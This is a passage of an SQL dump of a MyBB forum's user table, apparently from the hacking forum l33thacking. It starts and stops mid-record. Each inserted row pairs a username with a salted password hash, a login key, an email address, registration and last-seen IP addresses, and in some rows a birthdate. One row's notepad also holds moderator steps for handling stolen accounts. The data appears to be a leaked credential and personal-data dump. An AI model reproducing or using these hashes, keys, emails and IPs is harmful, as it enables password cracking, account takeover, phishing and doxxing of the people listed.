Brick\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_19_48.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:17;a:5:{s:4:\"acid\";i:17;s:4:\"name\";s:8:\"Reporter\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_22_36.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:14;a:5:{s:4:\"acid\";i:14;s:4:\"name\";s:4:\"Swag\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_16_33.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:9;a:5:{s:4:\"acid\";i:9;s:4:\"name\";s:9:\"Referrer \";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_07_10.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:1;a:5:{s:4:\"acid\";i:1;s:4:\"name\";s:15:\"Social Engineer\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_20_10_12_11_54_35.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:19;a:5:{s:4:\"acid\";i:19;s:4:\"name\";s:6:\"Genius\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_25_10.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:15;a:5:{s:4:\"acid\";i:15;s:4:\"name\";s:12:\"Silver Brick\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_18_16.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:8;a:5:{s:4:\"acid\";i:8;s:4:\"name\";s:5:\"Angel\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_05_53.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:2;a:1:{s:11:\"showpostbit\";i:0;}i:3;a:1:{s:11:\"showpostbit\";i:0;}i:4;a:1:{s:11:\"showpostbit\";i:0;}i:5;a:1:{s:11:\"showpostbit\";i:0;}i:6;a:1:{s:11:\"showpostbit\";i:0;}i:7;a:1:{s:11:\"showpostbit\";i:0;}i:10;a:1:{s:11:\"showpostbit\";i:0;}i:26;a:5:{s:4:\"acid\";i:26;s:4:\"name\";s:6:\"Sticky\";s:5:\"image\";s:58:\"inc/plugins/achivements/upload/custom_21_10_12_2_44_39.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:0;}}s:4:\"atid\";a:2:{i:1;a:5:{s:4:\"atid\";i:1;s:4:\"name\";s:12:\"Contributor \";s:5:\"image\";s:60:\"inc/plugins/achivements/upload/threads_21_10_12_12_11_32.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:2;a:5:{s:4:\"atid\";i:2;s:4:\"name\";s:10:\"10 Threads\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/threads_21_10_12_1_39_03.jpg\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}}}', '131', '0'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('224', 'monkey', '37423d66765b5c0daf3aec96ac00a231', 'OAzQjuWt', 'sFMf4y3XqlbvpSuuMlxza4Gj3a8H7ygpbZ9u4Rk4jjFAcsJJlE', 'alsalti.mutasim@yahoo.com', '0', '', '', '', '14', '', '0', '', '1349490987', '1350833628', '1350831439', '1350152195', '', '0', '', '', '', '19-3-1990', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '108.87.19.149', '108.87.21.224', '1817645973', '1817646560', '', '11159', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '0'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('225', 'Graycat', 'aba14313d1d7d5da3af195991903cba8', 'Rm82dg4V', 'bCLvyz22HgYlMNeD2OfoTro2GvHU1jmYdJOuUHjOrTX5vgs5if', 'cakes1337@gmail.com', '6', '', '', '', '2', '', '0', '', '1349495250', '1349745368', '1349702860', '1349702860', '', '0', '', '', '', '21-10-1993', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-6', '1', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '6', '75.162.63.63', '75.162.63.152', '1268924223', '1268924312', '', '2456', '1', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('154', 'fap', '89e5681ca4c09df5280575cc303bbb0c', 'Y2nzEaMQ', 'cXxxTuzGCTFZzkmCRNvMcLdgpoSm7n1zlaCz431DTZ6HELru2q', 'eqonix@live.co.uk', '4', '', '', '', '2', '', '0', '', '1346370056', '1347177983', '1346496503', '1346496493', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '1', '0', '0', '92.234.104.156', '72.229.164.105', '1558866076', '1223009385', '', '2087', '1', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '2', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('155', 'HaZe', '43514a07d9119200862155f97f68fed6', 'sMeZpXO5', 'Roq9PeK7Zhxelav3E9hu2Xfzcpz35OpIXneqpZPaMd6YXDgd2x', 'uregonnadie@yahoo.com', '0', '', '', '', '2', '', '0', '', '1346370609', '1346370888', '1346370609', '0', '', '0', '', '', '', '', 'all', '', '0', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-5', '1', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '173.52.27.23', '173.52.27.23', '-1389094121', '-1389094121', '', '281', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('156', 'Omniscent', 'f2dd256c3b511a3fdad34370103dfea0', 'DWvq8RYM', 'btqm8gerulCtZGDrDo6d8ICgRpIuRrA6XXXaXwvQcw5BTQU5ke', 'storm1336instant@gmail.com', '1', '', '', '', '2', '', '0', 'heyo.', '1346370834', '1346792351', '1346778855', '1346465732', '', '0', '', '', '', '', 'none', '', '1', '1', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '1', '0', '1', '74.14.157.68', '74.14.157.68', '1242471748', '1242471748', '', '4199', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '1', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('230', 'MatrixXx', '0790e591fb07a35c0a3d90eeef3378a7', 'bVLO2zXW', 'SCsKGfAuwfQpfAh5yt5TsgmLUETTPVO4KxPAeWhCPFBtKfvBWv', 'matrixxx35@gmail.com', '0', '', '', '', '2', '', '0', '', '1349637644', '1349638297', '1349638297', '0', '', '0', '', '', '', '4-6-1991', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '88.164.243.5', '88.164.243.5', '1487205125', '1487205125', '', '668', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('108', 'zipper1936', '72c660e635bbbb39c47fa575d33f9468', 'IN76ECoE', 'O3pryxoCjPb2dVGsJO8U2edZouySk3NuV2qCV95BOyHfP7EmOb', 'kentespinoza443@gmx.com', '0', '', '', '', '14', '', '0', '', '1345810510', '1345810768', '1345810767', '0', '', '0', '', '', '', '', 'all', '', '1', '1', '1', '1', '1', '0', '1', '1', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '1', '1', '1', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '0', '5.135.12.198', '5.135.12.96', '92736710', '92736608', 'english', '1', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '0'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('112', '??????Z', '9de5895dc445061e43fdf49124893025', 'O9DupUmh', 'BlzMPdxOrbBkv5USgGQcas2sBRHNvDzUwaJIEwmq4NPdRhZNx8', 'vaider@42commando.com', '35', 'http://i.imgur.com/yccvM.png?dateline=1347964416', '120|150', 'remote', '2', '', '0', 'SE N00B', '1345828459', '1350390938', '1350063877', '1347976009', '', '0', '', '', '', '', 'all', '[align=center][img]http://i.imgur.com/lkLHB.png[/img] [color=#696969]Email: kennerz@l33thacking.net[/color][/align]', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '5', '92.22.242.209', '2.100.220.219', '1545007825', '40164571', '', '63303', '1', '21', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '3', '0', '', '', 'b:0;', '6', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('228', 'VirtualLegend', '5d06ac4ace1250271e4e34043153f317', 'ObHJONpp', 'GbUH77RcjbcVQlZUrWTOInvrpTugEKI6M4aw41RFbwnCdOKWau', 'ielmessaoudi@unic-utrecht.nl', '271', './uploads/avatars/avatar_228.gif?dateline=1349717886', '100|80', 'upload', '6', '17,21,13', '6', 'Ball So Hard MotherF*ckers Wanna Find Me', '1349635899', '1352754885', '1352727059', '1352665871', '', '0', '', '', '', '13-7-1994', 'all', '', '1', '1', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '4', '10', '83.83.167.183', '83.83.167.183', '1397991351', '1397991351', '', '227579', '1', '47', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'a:3:{s:4:\"acid\";a:3:{i:8;a:5:{s:4:\"acid\";i:8;s:4:\"name\";s:5:\"Angel\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_05_53.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:1;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:2;a:1:{s:11:\"showpostbit\";i:0;}}s:4:\"apid\";a:3:{i:3;a:5:{s:4:\"apid\";i:3;s:4:\"name\";s:13:\"Cheers on 100\";s:5:\"image\";s:57:\"inc/plugins/achivements/upload/posts_21_10_12_1_37_43.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:1;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:2;a:1:{s:11:\"showpostbit\";i:0;}}s:4:\"atid\";a:2:{i:2;a:5:{s:4:\"atid\";i:2;s:4:\"name\";s:10:\"10 Threads\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/threads_21_10_12_1_39_03.jpg\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:1;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}}}', '19', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('232', 'BreShiE', 'ecc21dac489698bd8153c155a7372965', 'JofeSK8A', 'UiPc7k73eo6of3f1ULWxYUnPLFLauUnFiKqNofirrgppz4PcQq', 'breshie@hotmail.com', '28', './uploads/avatars/avatar_232.png?dateline=1349668623', '120|120', 'upload', '2', '12', '12', '', '1349651002', '1352516717', '1352001220', '1351631985', '', '0', '', '', '', '22-7-1994', 'all', '[align=center][url=http://breshie.com][img]http://breshie.com/breshiesig.png[/img][/url] [size=x-small][i]\"It was pretty impressive to watch a missile fly down an air vent, but couldn\'t we feasibly use that same technology to shoot food at hungry people?\"[/i][/size][/align]', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '1', '0', '78.149.68.187', '78.150.34.195', '1318405307', '1318462147', '', '21364', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '3', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('2', 'Apathy', '1e41e7c8a28b399c20ed592b9611a48e', 'vBQdndQV', 'nTrSpEeNXfJPvu5AB5C3ieKbGP6JFbswaI2jKcMznreJWnUiqP', 'lonerider223@yahoo.ca', '232', '', '', '', '3', '', '0', 'LH Co-Founder ', '1339902841', '1352811792', '1352781275', '1352765645', '', '0', '', '', '', '', 'all', '', '0', '1', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '1', '2', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '***Normal Members*** 1. Ask for their IP and check via (http://l33thacking.com/modcp.php?action=ipsearch) if a lot of posts come in the results. If a lot of results show up then it means that that IP has been used a lot also search users to see if it belongs to the stolen/hacked account. 2. Ask what latest PM they remember they replied to. Go to the hacked/stolen account and use the login to the account and browse their inbox to check if they are legit or not because anyone can get the IP. ***Normal Members but with donation award(s)*** 1. Ask for IP or IP and PM. 2. Ask them to give a screenshot of the donation transaction they made to LH then match date with award. ***Upgraded*** 1. Ask for IP 2. Proof of Purchase of upgrade. Picture or video, match date with the award given data. 3. Tell them to list any forum that can be viewed after upgrading under the VIP members tab. *#$*#$*#$*NOTE*#$*#$*#$* If you believe that the account really belongs to them then change their email to the new email they provide you. Then after they change the password, merge the account.', '0', '0', '26', '173.206.128.200', '108.162.240.5', '-1378975544', '1822617605', '', '106997', '1', '110', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', 'Pm me if you need help.', 'a:3:{s:4:\"apid\";a:3:{i:3;a:5:{s:4:\"apid\";i:3;s:4:\"name\";s:13:\"Cheers on 100\";s:5:\"image\";s:57:\"inc/plugins/achivements/upload/posts_21_10_12_1_37_43.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:1;a:2:{s:11:\"showpostbit\";i:0;s:11:\"showprofile\";i:0;}i:2;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}}s:4:\"atid\";a:2:{i:2;a:5:{s:4:\"atid\";i:2;s:4:\"name\";s:10:\"10 Threads\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/threads_21_10_12_1_39_03.jpg\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:1;a:2:{s:11:\"showpostbit\";i:0;s:11:\"showprofile\";i:0;}}s:4:\"acid\";a:12:{i:21;a:5:{s:4:\"acid\";i:21;s:4:\"name\";s:9:\"Music Fan\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_28_47.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:1;a:2:{s:11:\"showpostbit\";i:0;s:11:\"showprofile\";i:0;}i:2;a:2:{s:11:\"showpostbit\";i:0;s:11:\"showprofile\";i:0;}i:22;a:5:{s:4:\"acid\";i:22;s:4:\"name\";s:7:\"Painter\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_57_04.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:3;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:4;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:5;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:6;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:7;a:1:{s:11:\"showpostbit\";i:0;}i:8;a:1:{s:11:\"showpostbit\";i:0;}i:9;a:1:{s:11:\"showpostbit\";i:0;}i:10;a:1:{s:11:\"showpostbit\";i:0;}}}', '13', '0'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, 